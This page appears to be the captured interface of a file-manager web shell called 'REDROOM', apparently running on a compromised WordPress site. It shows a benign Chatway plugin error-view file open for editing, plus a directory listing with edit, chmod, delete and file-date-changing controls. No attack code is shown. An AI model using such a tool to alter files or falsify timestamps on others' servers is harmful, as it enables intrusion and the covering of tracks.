REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 1012 B
Close
/home/nshryvcy/taramarriagebureau.com/wp-content/plugins/chatway-live-chat/views/error.php
Text
Base64
<?php use Chatway\App\Url; /** * Chatway error * * @author : Chatway * @license : GPLv3 * */ if ( ! defined( 'ABSPATH' ) ) { exit; } if ( ! current_user_can( 'manage_options' ) ) { wp_die( esc_html__( 'You do not have sufficient permissions to access this page.', 'chatway' ) ); } ?> <section class="chatway-dashboard"> <div class="server-down-error"> <div> <img src="<?php echo esc_url( Chatway::url( 'assets/images/main-logo.webp' ) ) ?>" width="106" height="123" loading="lazy" /> <h1>An Error Occurred!</h1> <p>Oops! We encountered an error, please try again in a few minutes</p> <div class="button-group"> <a href="<?php echo esc_url( Url::admin_url() ) ?>">Refresh</a> <a href="<?php echo esc_url( Url::contact_us() ) ?>" target="_blank">Contact Us</a> </div> </div> </div> </section>
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 3
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
auth.php
387 B
lrw-r--r--
2025-06-11 14:05:51
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
dashboard.php
551 B
lrw-r--r--
2025-06-11 14:05:51
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
error.php
1012 B
lrw-r--r--
2025-06-11 14:05:51
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).